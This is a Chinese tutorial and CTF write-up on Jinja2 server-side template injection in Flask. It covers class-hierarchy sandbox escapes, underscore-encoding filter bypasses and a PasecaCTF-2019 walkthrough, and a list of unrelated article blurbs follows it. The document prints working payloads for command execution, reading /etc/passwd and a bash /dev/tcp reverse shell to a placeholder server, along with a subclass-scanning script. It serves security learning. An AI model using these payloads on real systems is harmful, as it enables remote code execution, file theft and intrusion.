SSTI模板注入(Flask+Jinja2)

文章目录

  • 一、前置知识
    • 1.1 模板引擎
    • 1.2 渲染
  • 二、SSTI模板注入
    • 2.1 原理
    • 2.2 沙箱逃逸
      • 沙箱逃逸payload讲解
      • 其他重要payload
    • 2.3 过滤绕过
  • 三、PasecaCTF-2019-Web-Flask SSTI

一、前置知识

1.1 模板引擎

  模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。
在这里插入图片描述

Flask是一个 web 框架,Jinja2是模板引擎。

模板引擎判断
在这里插入图片描述

绿色为执行成功,红色为执行失败。

1.2 渲染

  • 前端渲染( SPA , 单页面应用 )
      浏览器从服务器得到一些信息( 可能是 JSON 等各种数据交换格式所封装的数据包 , 也可能是合法的 HTML 字符串 ),浏览器将这些信息排列组合成人类可读的 HTML 字符串 . 然后解析为最终的 HTML 页面呈现给用户。整个过程都是由客户端浏览器完成的 , 因此对服务器后端的压力较小 , 仅需要传输数据即可。

    也就是说服务端只发送用户所需数据,浏览器负责将这部分数据排列成人类可读的HTML字符串。

  • 后端渲染( SSR , 服务器渲染 )
      浏览器会直接接收到经过服务器计算并排列组合后的 HTML 字符串 , 浏览器仅需要将字符串解析为呈现给用户的 HTML 页面就可以了 。整个过程都是由服务器完成的 , 因此对客户端浏览器的压力较小 , 大部分任务都在服务器端完成了 , 浏览器仅需要解析并呈现 HTML 页面即可。

    也就是说服务端将用户所需的数据排列成人类可读的HTML字符串了,浏览器只需对传输的数据解码就可以用了。

Flask中的重要渲染函数:render_template()render_template_string()
Jinja2模板语法:

{% ... %} //声明变量,当然也可以用于循环语句和条件语句。
{{ ... }} //用于将表达式打印到模板输出

二、SSTI模板注入

2.1 原理

  漏洞成因:服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。

  凡是使用模板的地方都可能会出现 SSTI 的问题,SSTI 不属于任何一种语言,沙盒绕过也不是,沙盒绕过只是由于模板引擎发现了很大的安全漏洞,然后模板引擎设计出来的一种防护机制,不允许使用没有定义或者声明的模块,这适用于所有的模板引擎。

举一个栗子,下面是后端代码:

from flask import Flask, request
from jinja2 import Template

app = Flask(__name__)

@app.route("/")
def index():
    name = request.args.get('name', 'guest')

    t = Template("Hello " + name)
    return t.render()

if __name__ == "__main__":
    app.run()

name变量完全可控,那么写入Jinja2模板语言:
在这里插入图片描述
这大概就是SSTI模板注入,使用{{....}}的方式测试参数,可以用来判断是否存在SSTI模板注入。

2.2 沙箱逃逸

  在上述代码中,虽然理论上可以实现任意代码执行,但由于模板本身的沙盒安全机制,某些语句并不会执行,如直接name={{os.popen(%27dir%27)}}。沙盒逃逸的过程简单讲如下:

变量类型 → \rightarrow 找到所属类型 → \rightarrow 回溯基类 → \rightarrow 寻找可利用子类 → \rightarrow 最终payload

一些内建魔术方法如下:

  • __class__:用来查看变量所属的类,根据前面的变量形式可以得到其所属的类。
    >>> ''.__class__
    <type 'str'>
    >>> ().__class__
    <type 'tuple'>
    >>> [].__class__
    <type 'list'>
    >>> {}.__class__
    <type 'dict'>
    
  • __bases__:用来查看类的基类,也可是使用数组索引来查看特定位置的值。
    >>> ().__class__.__bases__
    (<type 'object'>,)
    >>> ''.__class__.__bases__
    (<type 'basestring'>,)
    >>> [].__class__.__bases__
    (<type 'object'>,)
    >>> {}.__class__.__bases__
    (<type 'object'>,)
    >>> [].__class__.__bases__[0]
    <type 'object'>
    
  • __mro__:也可以获取基类
    >>> ''.__class__.__mro__
    (<class 'str'>, <class 'object'>)
    >>> [].__class__.__mro__
    (<class 'list'>, <class 'object'>)
    >>> {}.__class__.__mro__
    (<class 'dict'>, <class 'object'>)
    >>> ().__class__.__mro__
    (<class 'tuple'>, <class 'object'>)
    >>> ().__class__.__mro__[1]            # 使用索引就能获取基类了
    <class 'object'>
    
  • __subclasses__():以列表返回类的子类
  • _globals__:以dict返回函数所在模块命名空间中的所有变量

沙箱逃逸payload讲解

  以下面的payload为例详细阐述沙箱逃逸的思路。{{''.__class__.__base__.__subclasses__()[80].__init__.__globals__['__builtins__'].eval("__import__('os').popen('type flag.txt').read()")}}

核心思想:核心在于python中类的继承与被继承的关系,通过这种关系的查找合适的类,找到合适的类后利用该类中的函数或者模块去调用与读取文件相关的函数或命令,上述payload中获取flag或者重要文件信息的关键是eval("__import__('os').popen('type flag.txt').read()")

  1. 除了标准的python语法使用.访问变量属性外,还可以使用[]来访问变量属性。

  2. ''.__class____class__是类中的一个内置属性,值是该实例的对应的类。这里使用的是’'.class,得到的则是空字符串这个实例对应的类,也就是字符类。这样操作的意义是将我们现在操作的对象切换到类上面去,这样才能进行之后继承与被继承的操作。也可以使用()/[]/{}
    在这里插入图片描述

  3. ''.__class__.__base____base__也是类中的一个内置属性,值当前类的父类,而在python中object是一切类最顶层的父类,也就是说我们可以通过上一步获取到的类往上获取(一般数据类型的上一层父类中便有object),最终便会获取到object,而由于object的特殊性,我们便能从object往下获取到其他所有的类,其中便有着能实现我们读取flag功能的类。
    在这里插入图片描述

    其他类似功能的还有__bases____mro__,但返回的数据包含类的元组,所以还需要下标选定object类)。

  4. ''.__class__.__base__.__subclasses__()__subclasses__ ()是类中的一个内置方法,返回值是包含当前类所有子类的一个列表,通过上一步获取到的object类我们实现了向下获取,接着我们需要在这些子类中获取合适的类。
    在这里插入图片描述

  5. ''.__class__.__base__.__subclasses__()[80].__init__ __init__是类中的内置方法,在这个类实例化是自动被调用,但是返回值只能是None,且在调用时必须传入该类的实例对象。如果我们不去调用它,此时我们获得的是我们选取的类中的__init__这个函数。由于python一切皆对象的特性,函数本质上也是对象,也存在类中的一些内置方法和内置属性,所以我们可以执行接下来的操作。
    在这里插入图片描述

  6. ''.__class__.__base__.__subclasses__()[80].__init__.__globals____globals__是函数中的一个内置属性,以字典的形式返回当前空间的全局变量,而其中就能找到我们需要的目标模块__builtins__
    在这里插入图片描述

    注意:并不是每个类的__init__都拥有__globals__属性,找__init__中拥有__globals__属性的类的原因是:__builtins__模块中有很多我们常用的内置函数和类,其中就有eval()函数。
    在这里插入图片描述

    还可以使用下面的脚本去寻找__init__中拥有__globals__属性的类

    import requests as res
    for i in range(0,400):
    	url="http://127.0.0.1:5000/ssti?name={{''.__class__.__base__.__subclasses__()[%d].__init__.__globals__}}"
    	response=res.get(url%i)
    	print(len(response.text),i,response.status_code)
    

    在这里插入图片描述

其他重要payload

  1. 作为储存配置信息的变量config刚好对应的就是一个非常合适的类,因为这个类中__init__函数全局变量中已经导入了os模块,我们可以直接调用。{{config.__class__.__init__.__globals__['os'].popen('type flag.txt').read()}}

  2. 读取文件payload

    ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()
    

    object类的子类是<type 'file'>

  3. 任意代码执行

    ''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__.popen('ls').read() //这个可以用
    
    # eval
    ''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('id').read()")
    ''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__.__builtins__.eval("__import__('os').popen('id').read()")
    
    # 反弹shell
    ''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('bash -i >& /dev/tcp/你的服务器地址/端口 0>&1').read()
    
  4. {{config}},查看配置信息
    在这里插入图片描述

  5. {{request.environ}},一个与服务器环境相关的对象字典 .
    在这里插入图片描述

2.3 过滤绕过

  • 过滤.,使用[]。如
    "".__class__ == ""["__class__"]
    ""|attr("__class__")
    "".__getattribute__("__class__")
    
  • 过滤_,使用编码绕过
    "__class__"=="\x5f\x5fclass\x5f\x5f" //UTF-8编码
    

三、PasecaCTF-2019-Web-Flask SSTI

登录靶机,输入1,页面又返回1,因为提示使用Flask框架,使用{{1+1}}测试是否渲染引擎为Jinja2
在这里插入图片描述在这里插入图片描述

说明此处存在SSTI模板注入,且框架为Flask,模板引擎Jinja2

在这里插入图片描述

注释:

  • jQuery是javascript的一个库, $号是jQuery类的一个别称,$()构造了一个jQuery对象,$()可以叫做jQuery的构造函数。
  • $.post语法:jQuery.post(url, data, success(data,textStatus,jqXHR), datatype),其中:
    • url,规定把请求发送到哪个URL;
    • data,规定连同请求发送给服务器的数据;
    • success(data,textStatus,jqXHR),请求成功时返回的回调函数;
    • datatype,规定预期服务器响应的数据类型。

测试发现过滤了. * _
在这里插入图片描述
在这里插入图片描述
使用UTF-8编码绕过过滤,{{""["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbases\x5f\x5f"]}}
在这里插入图片描述
读取app.py文件,{{""["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbases\x5f\x5f"][0]["\x5f\x5fsubclasses\x5f\x5f"]()[117]["\x5f\x5finit\x5f\x5f"]["\x5f\x5fglobals\x5f\x5f"]["popen"]("ls")["read"]()}}

在这里插入图片描述
通过阅读代码,发现flag经过加密后放在app.config中。app就是一个Flask对象,app.config存储这个Flask对象的所有配置变量。
{{config}}查看配置变量,'flag': '(U0\x1fy\x13y:0Sq5(\x11F\x03o\x0fdB\x1c\x13[X!jYeN_\x10\x15'}
在这里插入图片描述
好,不会解密了。噶~

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/264475.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

nodejs+vue+ElementUi会员制停车场车位系统

总之&#xff0c;智能停车系统使停车场管理工作规范化&#xff0c;系统化&#xff0c;程序化&#xff0c;避免停车场管理的随意性&#xff0c;提高信息处理的速度和准确性&#xff0c;能够及时、准确、有效的查询和修改停车场情况。 三、任务&#xff1a;小组任务和个人任务 智…

Linux中vim中进行替换/批量替换

Linux中vim中进行替换/批量替换 一:在 Vim 中进行文本替换的操作是通过使用 :s&#xff08;substitute&#xff09;命令来实现的。这里是一些基本的替换命令 替换当前行的第一个匹配项: :s/old/new/这将替换当前行中第一个出现的 “old” 为 “new”。 替换当前行的所有匹配项…

工作实践篇 Flink(一:flink提交jar)

一&#xff1a;参数 flink 模式 – standalone 二&#xff1a;步骤 1. 将本地测试好的代码进行本地运行。确保没问题&#xff0c;进行打包。 2. 找到打好的jar包&#xff0c;将jar包上传到对应的服务器。 3. 执行flink命令&#xff0c;跑代码。 /opt/flink/flink-1.13.6/bi…

ASP.Net实现姓名添加查询(三层架构)

目录 演示功能&#xff1a; 点击启动生成页面 点击搜索模糊查询 点击添加跳转新界面 点击Button添加姓名 步骤&#xff1a; 1、建文件 2、添加引用关系 3、根据数据库中的列写Models下的XueshengModels类 4、DAL下的DBHelper&#xff08;对数据库进行操作&#xff09;…

轻量Http客户端工具VSCode和IDEA

文章目录 前言Visual Studio Code 的插件 REST Client编写第一个案例进阶&#xff0c;设置变量进阶&#xff0c;设置Token 前言 作为一个WEB工程师&#xff0c;在日常的使用过程中&#xff0c;HTTP请求是必不可少的。我们采用的HTTP工具有如下&#xff1a; Postman Insomnia Ap…

MyBatis见解3

8.MyBatis的关联查询 8.3.一对多查询 需求&#xff1a;查询所有用户信息及用户关联的账户信息。 分析&#xff1a;用户信息和他的账户信息为一对多关系&#xff0c;并且查询过程中如果用户没有账户信息&#xff0c;此时也要将用户信息查询出来&#xff0c;此时左外连接查询比…

Spring和Spring Boot框架中怎么理解Bean这个核心概念

在Spring和Spring Boot框架中&#xff0c;Bean是一个核心概念。要理解Spring Boot中的Bean&#xff0c;我们可以从以下几个方面进行&#xff1a; 定义&#xff1a; Bean是Spring框架中的一个对象&#xff0c;由Spring容器管理。当我们在应用程序中需要某个对象时&#xff0c;我…

Deepin更换仿Mac主题

上一篇博客说了要写一篇deepin系统的美化教程 先看效果图&#xff1a; 准备工作&#xff1a; 1.你自己 嘻嘻嘻 2.能上网的deepin15.11电脑 首先去下载主题 本次需要系统美化3部分&#xff1a;1.图标 2.光标 3.壁纸 开始之前&#xff0c;请先把你的窗口特效打开&#xff0c;…

华为设备命令行操作基础

熟悉VRP命令行并且熟练掌握VRP配置是高效管理华为网络设备的必备基础。 设备初始化启动 管理员和工程师如果要访问在通用路由平台VRP上运行的华为产品&#xff0c;首先要进入启动程序。开机界面信息提供了系统启动的运行程序和正在运行的VRP版本及其加载路径。启动完成以后&am…

spring aop实际开发中怎么用,Spring Boot整合AOP,spring boot加spring mvc一起使用aop,项目中使用aop

前言&#xff1a;本文不介绍 AOP 的基本概念、动态代理方式实现 AOP&#xff0c;以及 Spring 框架去实现 AOP。本文重点介绍 Spring Boot 项目中如何使用 AOP&#xff0c;也就是实际项目开发中如何使用 AOP 去实现相关功能。 如果有需要了解 AOP 的概念、动态代理实现 AOP 的&…

【PHP手麻系统源码】基于mysql+laravel+vue开发的医院手术麻醉系统源码,实现围术期患者数据的自动采集与共享

手麻系统作为医院信息化系统的一环&#xff0c;由监护设备数据采集系统和麻醉信息管理系统两个子部分组成。手麻信息系统覆盖了患者术前、术中、术后的手术过程&#xff0c;可以实现麻醉信息的电子化和手术麻醉全过程动态跟踪。 以服务围术期临床业务工作的开展为核心&#xf…

分布式搜索elasticsearch概念

什么是elasticsearch&#xff1f; elasticsearch是一款非常强大的开源搜索引擎&#xff0c;可以帮助我们从海量数据中快速找到需要的内容 目录 elasticsearch的场景 elasticsearch的发展 Lucene篇 Elasticsearch篇 elasticsearch的安装 elasticsearch的场景 elasticsear…

BigQuery 分区表简介和使用

大纲 什么是分区表 我们先看定义&#xff1a; 分区表是一种数据库表设计和管理技术&#xff0c;它将表中的数据划分为逻辑上的多个分区&#xff0c;每个分区包含一组特定的数据。每个分区都根据定义的分区键&#xff08;通常是一个列或字段&#xff09;的值进行分类&#xff…

构建创新学习体验:企业培训系统技术深度解析

企业培训系统在现代企业中发挥着越来越重要的作用&#xff0c;它不仅仅是传统培训的延伸&#xff0c;更是技术创新的结晶。本文将深入探讨企业培训系统的关键技术特点&#xff0c;并通过一些简单的代码示例&#xff0c;展示如何在实际项目中应用这些技术。 1. 前端技术&#…

SLAM算法与工程实践——雷达篇:Livox激光雷达使用

SLAM算法与工程实践系列文章 下面是SLAM算法与工程实践系列文章的总链接&#xff0c;本人发表这个系列的文章链接均收录于此 SLAM算法与工程实践系列文章链接 下面是专栏地址&#xff1a; SLAM算法与工程实践系列专栏 文章目录 SLAM算法与工程实践系列文章SLAM算法与工程实践…

微信小程序格创校园跑腿小程序源码v1.1.64+前端

简介&#xff1a; 版本号&#xff1a;1.1.64 – 多学校版本 本次更新内容&#xff1a; 订单问题修复 &#xff08;无需上传小程序&#xff09; 版本号&#xff1a;1.1.63 – 多学校版本 本次更新内容&#xff1a; 失物招领增加内容安全接口&#xff1b; 认证增加性别选…

freeswitch on debian docker

概述 freeswitch是一款简单好用的VOIP开源软交换平台。 因为centos系统期限的原因&#xff0c;尝试在debian的docker上使用fs。 环境 docker engine&#xff1a;Version 24.0.6 debian docker&#xff1a;bullseye 11.8 freeswitch&#xff1a;v1.10.7 Debian准备 目前…

有待写入光盘的文件处理办法

windows11系统中 dvd盘中拖入文件后&#xff0c;文件未写入&#xff0c;信息提示有待写入光盘的文件 处理办法&#xff1a; 同时按住shift鼠标右键&#xff0c;点击光盘图标&#xff1a; 选择刻录到光盘 点击下一步 选择重新刻录 反复几次发现无法完成。 最后处理办法&…

【Grafana】Grafana匿名访问以及与LDAP连接

上一篇文章利用Docker快速部署了Grafana用来展示Zabbix得监控数据&#xff0c;但还需要给用户去创建账号允许他们登录后才能看展示得数据&#xff0c;那有什么办法让非管理员更方便得去访问Grafana呢&#xff1f;下面介绍两个比较方便实现的&#xff1a; 在开始设置前&#xff…

FastAPI实现文件上传下载

FastAPI实现文件上传下载 1.后端FastAPI2.后端html3.效果 最近的项目需求&#xff0c;是前端vue&#xff0c;后端fastAPI&#xff0c;然后涉及到图像的消息发送&#xff0c;所以需要用fast写文件上传下载的接口&#xff0c;这里简单记录一下。 1.后端FastAPI import os.path i…